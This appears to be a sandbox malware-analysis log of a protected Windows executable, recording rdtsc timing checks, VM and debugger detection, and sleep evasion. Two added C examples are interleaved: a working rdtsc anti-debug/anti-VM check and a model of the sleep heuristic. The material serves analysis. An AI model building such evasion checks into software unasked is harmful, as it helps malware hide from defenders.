Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7220241 second address: 7220261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 lock bts dword ptr [edi], 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F70F070E5D2h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7220261 second address: 72202B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F70F0BCDB11h 0x00000009 adc ax, 51A6h 0x0000000e jmp 00007F70F0BCDB11h 0x00000013 popfd 0x00000014 mov ax, 38D7h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b jc 00007F716086FCA5h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F70F0BCDB19h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72202B5 second address: 72202C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72202C5 second address: 72202EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F70F0BCDB18h 0x00000011 push eax 0x00000012 pop edx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72202EC second address: 722030F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov ax, 2A81h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 725078F second address: 72507A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d movzx esi, bx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72507A5 second address: 72507C3 instructions: 0x00000000 rdtsc 0x00000002 movsx edi, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ch, C7h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F70F070E5D1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72507C3 second address: 725081C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F70F0BCDB17h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F70F0BCDB19h 0x0000000f adc ecx, 5D968A66h 0x00000015 jmp 00007F70F0BCDB11h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e xchg eax, ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov ax, bx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 725081C second address: 7250821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7240918 second address: 724091E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 724091E second address: 7240931 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F70F070E5CEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7240931 second address: 724093F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 724093F second address: 7240943 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7240943 second address: 7240949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7240949 second address: 7240964 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7240964 second address: 72409A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F70F0BCDB13h 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F70F0BCDB16h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F70F0BCDB0Ah 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72409A4 second address: 72409AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72409AA second address: 7240A1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F70F0BCDB0Ah 0x0000000b or ch, FFFFFF98h 0x0000000e jmp 00007F70F0BCDB0Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F70F0BCDB0Bh 0x00000021 xor cl, 0000005Eh 0x00000024 jmp 00007F70F0BCDB19h 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007F70F0BCDB10h 0x00000030 and ch, 00000058h 0x00000033 jmp 00007F70F0BCDB0Bh 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7240A1A second address: 7240A20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7240A20 second address: 7240A24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7250AB8 second address: 7250AD0 instructions: 0x00000000 rdtsc 0x00000002 call 00007F70F070E5CBh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7250AD0 second address: 7250AD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7250AD6 second address: 7250B9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 0DBD9375h 0x00000008 call 00007F70F070E5D2h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], ebp 0x00000014 pushad 0x00000015 call 00007F70F070E5D7h 0x0000001a pushfd 0x0000001b jmp 00007F70F070E5D8h 0x00000020 sbb eax, 1AC95A58h 0x00000026 jmp 00007F70F070E5CBh 0x0000002b popfd 0x0000002c pop eax 0x0000002d pushfd 0x0000002e jmp 00007F70F070E5D9h 0x00000033 or esi, 30C095F6h 0x00000039 jmp 00007F70F070E5D1h 0x0000003e popfd 0x0000003f popad 0x00000040 mov ebp, esp 0x00000042 jmp 00007F70F070E5CEh 0x00000047 push dword ptr [ebp+04h] 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F70F070E5D7h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7250B9A second address: 7250BA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7250BA0 second address: 7250BA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7250BA4 second address: 7250BA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C0A32 second address: 72C0A36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C0A36 second address: 72C0A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C0A3C second address: 72C0A88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F70F070E5CEh 0x00000012 jmp 00007F70F070E5D5h 0x00000017 popfd 0x00000018 call 00007F70F070E5D0h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C0A88 second address: 72C0AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dl, byte ptr [ebp+14h] 0x00000009 jmp 00007F70F0BCDB17h 0x0000000e mov eax, dword ptr [ebp+10h] 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C0AAF second address: 72C0B18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F70F070E5D0h 0x0000000a add ax, 9508h 0x0000000f jmp 00007F70F070E5CBh 0x00000014 popfd 0x00000015 popad 0x00000016 pushfd 0x00000017 jmp 00007F70F070E5D8h 0x0000001c adc eax, 6AAE3768h 0x00000022 jmp 00007F70F070E5CBh 0x00000027 popfd 0x00000028 popad 0x00000029 and dl, 00000007h 0x0000002c pushad 0x0000002d mov edi, ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F70F070E5CEh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C0B18 second address: 72C0B28 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 test eax, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C0B28 second address: 72C0B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C0B2C second address: 72C0B32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C0B32 second address: 72C0B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C0B42 second address: 72C0B8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F71607F31A5h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F70F0BCDB0Bh 0x0000001a xor si, 3D6Eh 0x0000001f jmp 00007F70F0BCDB19h 0x00000024 popfd 0x00000025 mov di, cx 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C0B8B second address: 72C0BA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5D8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C0BA7 second address: 72C0BCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, 00000000h 0x0000000d jmp 00007F70F0BCDB0Ch 0x00000012 inc ecx 0x00000013 pushad 0x00000014 mov dx, ax 0x00000017 popad 0x00000018 shr eax, 1 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C0BCE second address: 72C0BD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C0BD2 second address: 72C0BD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C0BD6 second address: 72C0BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C0BDC second address: 72C0BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F0BCDB16h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C0BF6 second address: 72C0A32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F7160333B99h 0x0000000d jne 00007F70F070E5BDh 0x0000000f inc ecx 0x00000010 shr eax, 1 0x00000012 jne 00007F70F070E5BDh 0x00000014 imul ecx, ecx, 03h 0x00000017 movzx eax, dl 0x0000001a cdq 0x0000001b sub ecx, 03h 0x0000001e call 00007F70F071EABDh 0x00000023 cmp cl, 00000040h 0x00000026 jnc 00007F70F070E5D7h 0x00000028 cmp cl, 00000020h 0x0000002b jnc 00007F70F070E5C8h 0x0000002d shld edx, eax, cl 0x00000030 shl eax, cl 0x00000032 ret 0x00000033 or edx, dword ptr [ebp+0Ch] 0x00000036 or eax, dword ptr [ebp+08h] 0x00000039 or edx, 80000000h 0x0000003f pop ebp 0x00000040 retn 0010h 0x00000043 push ebp 0x00000044 push 00000001h 0x00000046 push edx 0x00000047 push eax 0x00000048 call edi 0x0000004a mov edi, edi 0x0000004c jmp 00007F70F070E5D2h 0x00000051 xchg eax, ebp 0x00000052 jmp 00007F70F070E5D0h 0x00000057 push eax 0x00000058 jmp 00007F70F070E5CBh 0x0000005d xchg eax, ebp 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007F70F070E5D0h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A0E34 second address: 72A0E46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A0E46 second address: 72A0E59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5CFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A0E59 second address: 72A0E5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: BDFAD8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: D8DA07 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: BDF9B7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: E17F16 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00719980 rdtsc 0_2_00719980
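The RDTSC interceptor records above are what a timing check looks like once a protector has wrapped it in junk: each record is a pair of rdtsc reads with pushad/popad, opaque jmps and dummy movs between them, and the memory strings listed further down (\\.\Oreans.vxd, Software\WinLicense) are consistent with the Oreans WinLicense/Themida protector, which is known for exactly this construction. The C program below is an added example, not code from the sample or from Joe Sandbox. It shows the check in plain form: bracket a short run of instructions with two counter reads, take the median over many rounds, and compare it with a threshold; a debugger single-stepping the gap, an API-hooking sandbox or a hypervisor that traps RDTSC inflates the delta by orders of magnitude. The threshold value, the junk loop and the round count are assumptions of the example, and on a non-x86 host the counter read falls back to the monotonic clock so the program still runs.

```c
/*
 * Added example (not the sample's or Joe Sandbox's code): an rdtsc-based
 * timing check of the kind recorded by the RDTSC instruction interceptor.
 * Assumptions: TSC_THRESHOLD, the junk loop and the round count are chosen
 * for illustration, not taken from the sample.
 */
#define _POSIX_C_SOURCE 199309L
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <time.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
static uint64_t tsc_now(void) { return __rdtsc(); }       /* real RDTSC */
#else
/* Non-x86 build host: use the monotonic clock so the example still runs. */
static uint64_t tsc_now(void) {
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
}
#endif

/* One reading: rdtsc, a little data-independent work, rdtsc.  The sample pads
 * this gap with pushad/popad, junk movs and opaque jmps instead of a loop. */
uint64_t measure_once(void) {
    volatile uint32_t sink = 0;
    uint64_t t0 = tsc_now();
    for (uint32_t i = 0; i < 16; i++)
        sink += i * 0x2EDD291Fu;                            /* junk work */
    uint64_t t1 = tsc_now();
    return t1 - t0;
}

/* Assumed threshold in counter ticks; a real protector tunes this per check. */
#define TSC_THRESHOLD 0x10000ull

/* The decision itself: a large delta means something slowed the gap down. */
int delta_looks_instrumented(uint64_t delta, uint64_t threshold) {
    return delta > threshold;
}

static int cmp_u64(const void *a, const void *b) {
    uint64_t x = *(const uint64_t *)a, y = *(const uint64_t *)b;
    return (x > y) - (x < y);
}

/* Median of n readings.  One interrupt or context switch makes a single
 * reading huge; taking many readings (the log shows dozens of rdtsc pairs)
 * and using the median keeps a clean machine from tripping the check. */
uint64_t median_u64(uint64_t *v, size_t n) {
    qsort(v, n, sizeof *v, cmp_u64);
    return v[n / 2];
}

/* Full check: `rounds` readings, median, threshold.  1 = instrumented. */
int timing_check(size_t rounds, uint64_t threshold) {
    uint64_t *d = malloc(rounds * sizeof *d);
    if (!d) return 0;
    for (size_t i = 0; i < rounds; i++) d[i] = measure_once();
    uint64_t m = median_u64(d, rounds);
    free(d);
    return delta_looks_instrumented(m, threshold);
}

int main(void) {
    int hit = timing_check(64, TSC_THRESHOLD);
    printf("rdtsc timing check: %s\n",
           hit ? "analysis environment suspected" : "no anomaly");
    return 0;
}
```

Run it natively, then under a debugger stepping through measure_once, or in a VM with RDTSC exiting enabled, and compare the verdicts; the per-check threshold is what an analyst patches, or what the hypervisor's TSC offsetting has to hide, to get past a check of this shape.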
Source: C:\Users\user\Desktop\file.exe TID: 6804 | Thread sleep count: 36 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6804 | Thread sleep time: -72036s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 6968 | Thread sleep count: 65 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6968 | Thread sleep time: -130065s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 5492 | Thread sleep count: 65 > 30
Source: C:\Users\user\Desktop\file.exe TID: 5492 | Thread sleep time: -130065s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 1308 | Thread sleep count: 55 > 30
Source: C:\Users\user\Desktop\file.exe TID: 1308 | Thread sleep time: -110055s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2172 | Thread sleep count: 56 > 30
Source: C:\Users\user\Desktop\file.exe TID: 2172 | Thread sleep time: -112056s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 5496 | Thread sleep count: 53 > 30
Source: C:\Users\user\Desktop\file.exe TID: 5496 | Thread sleep time: -106053s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 6716 | Thread sleep count: 59 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6716 | Thread sleep time: -118059s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 5632 | Thread sleep count: 60 > 30
Source: C:\Users\user\Desktop\file.exe TID: 5632 | Thread sleep time: -120060s >= -30000s
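The eight sleep records above share one property: every thread's total equals its call count times 2001 (36 x 2001 = 72036, 65 x 2001 = 130065, and so on), so each thread loops over a sleep of roughly two seconds, and since the whole analysis lasted 5m 40s the totals the report prints with an "s" suffix are cumulative milliseconds. The C program below is an added example, not Joe Sandbox's code. It models the heuristic the two thresholds express (more than 30 calls, or 30000 ms or more in total, per thread) over a dataset constructed from the report's own per-thread counts; the 2001 ms per-call value is inferred from those figures, and the two extra threads (a benign TID 4242 and a TID 4343 that trips only the total-time threshold) are assumptions added for contrast.

```c
/*
 * Added example (not Joe Sandbox's code): the per-thread sleep-evasion
 * heuristic behind the "Thread sleep count" / "Thread sleep time" records.
 * The dataset is constructed from the report's counts; the 2001 ms per call
 * is inferred (total / count) and TIDs 4242 and 4343 are assumed.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define MAX_SLEEP_COUNT    30      /* "Thread sleep count: N > 30" */
#define MAX_SLEEP_TOTAL_MS 30000   /* "Thread sleep time: -N >= -30000" */

struct sleep_call  { uint32_t tid; uint32_t ms; };
struct thread_stat { uint32_t tid; uint32_t count; uint64_t total_ms; };

/* Sum one thread's Sleep calls.  Returns 1 if either threshold is exceeded. */
int classify_thread(const struct sleep_call *calls, size_t n, uint32_t tid,
                    struct thread_stat *out) {
    struct thread_stat s = { tid, 0, 0 };
    for (size_t i = 0; i < n; i++) {
        if (calls[i].tid != tid) continue;
        s.count++;
        s.total_ms += calls[i].ms;
    }
    if (out) *out = s;
    return s.count > MAX_SLEEP_COUNT || s.total_ms >= MAX_SLEEP_TOTAL_MS;
}

/* Per-thread call counts as printed in the report (constructed dataset). */
static const struct { uint32_t tid; uint32_t count; } REPORTED[] = {
    { 6804, 36 }, { 6968, 65 }, { 5492, 65 }, { 1308, 55 },
    { 2172, 56 }, { 5496, 53 }, { 6716, 59 }, { 5632, 60 },
};
#define PER_CALL_MS 2001                       /* inferred: 72036 / 36 */
#define N_CALLS (36 + 65 + 65 + 55 + 56 + 53 + 59 + 60 + 3 + 10)

size_t build_sample(struct sleep_call *buf, size_t cap) {
    size_t n = 0;
    for (size_t t = 0; t < sizeof REPORTED / sizeof REPORTED[0]; t++)
        for (uint32_t i = 0; i < REPORTED[t].count && n < cap; i++)
            buf[n++] = (struct sleep_call){ REPORTED[t].tid, PER_CALL_MS };
    for (int i = 0; i < 3 && n < cap; i++)     /* assumed benign thread */
        buf[n++] = (struct sleep_call){ 4242, 100 };
    for (int i = 0; i < 10 && n < cap; i++)    /* assumed: few calls, long sleeps */
        buf[n++] = (struct sleep_call){ 4343, 5000 };
    return n;
}

/* Wrappers over the constructed dataset, used by main() and by the tests. */
int demo_is_evasive(uint32_t tid) {
    struct sleep_call calls[N_CALLS];
    size_t n = build_sample(calls, N_CALLS);
    return classify_thread(calls, n, tid, NULL);
}
uint32_t demo_count(uint32_t tid) {
    struct sleep_call calls[N_CALLS];
    struct thread_stat s;
    classify_thread(calls, build_sample(calls, N_CALLS), tid, &s);
    return s.count;
}
uint64_t demo_total_ms(uint32_t tid) {
    struct sleep_call calls[N_CALLS];
    struct thread_stat s;
    classify_thread(calls, build_sample(calls, N_CALLS), tid, &s);
    return s.total_ms;
}

int main(void) {
    struct sleep_call calls[N_CALLS];
    size_t n = build_sample(calls, N_CALLS);
    uint32_t tids[] = { 6804, 6968, 5492, 1308, 2172, 5496, 6716, 5632, 4242, 4343 };
    for (size_t i = 0; i < sizeof tids / sizeof tids[0]; i++) {
        struct thread_stat s;
        int hit = classify_thread(calls, n, tids[i], &s);
        printf("TID %u: %u sleeps, %llu ms total -> %s\n", (unsigned)s.tid,
               (unsigned)s.count, (unsigned long long)s.total_ms,
               hit ? "evasive" : "ok");
    }
    return 0;
}
```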
Source: C:\Users\user\Desktop\file.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0053255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0053255D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005329FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_005329FF
Source: file.exe, file.exe, 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: file.exe | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: file.exe, 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
